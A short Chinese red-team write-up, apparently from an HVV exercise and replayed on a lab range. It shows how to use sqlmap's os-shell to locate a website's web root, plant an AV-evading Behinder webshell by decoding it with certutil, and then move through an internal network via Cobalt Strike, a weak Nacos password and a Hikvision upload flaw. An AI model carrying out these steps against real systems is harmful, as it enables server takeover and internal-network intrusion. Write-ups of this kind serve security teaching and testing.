记某次HVV：通过sql注入打入内网

前言：

某次hvv打点遇到的，这里我用靶场作为演示为大家提供一个sqlmap注入后，找网站绝对路径的思路

正文：

前提：sqlmap注入可以使用os-shell，且为dba权限。

01 os-shell查找网站绝对路径

fsutil fsinfo drives   //先看系统都有哪些盘

这里可以找一张图片然后通过find命令来寻找它的路径（这里我选择找网站的一个背景图）。

dir /a /s /b C:\ | findstr "loginbg.jpg" >111.txt  //在C盘中查找loginbg.jpg

type 111.txt

返回空，说明网站根目录不在C盘

dir /a /s /b D:\ | findstr "loginbg.jpg" >111.txt   //在D盘中查找loginbg.jpg

type 111.txt

成功找到目录猜测为1和2，我选择写到D:\xxx\Content\image目录下

02 os-shell写入冰蝎免杀马

1.将冰蝎webshell进行base64加密，分成4段进行传输。

2.解密冰蝎马

certutil -decode D:\xxx\Content\images\Test.txt D:\xxx\Content\images\text2.aspx

//第一个路径为写入webshell的txt绝对径，第二个路径是生成冰蝎马的路径（一定要在网站绝对路径下）

这里我之前解密过一次，所以提示文件存在。

3.访问webshell，冰蝎马成功写入网站

4.连接webshell

03 内网

之后就是简单的传免杀马上线cs了。

扫描内网网段发现nacos，好家伙弱口令，直接读到数据库密码，连上数据库。

好家伙，内网还有海康威视文件上传，传马，上线CS。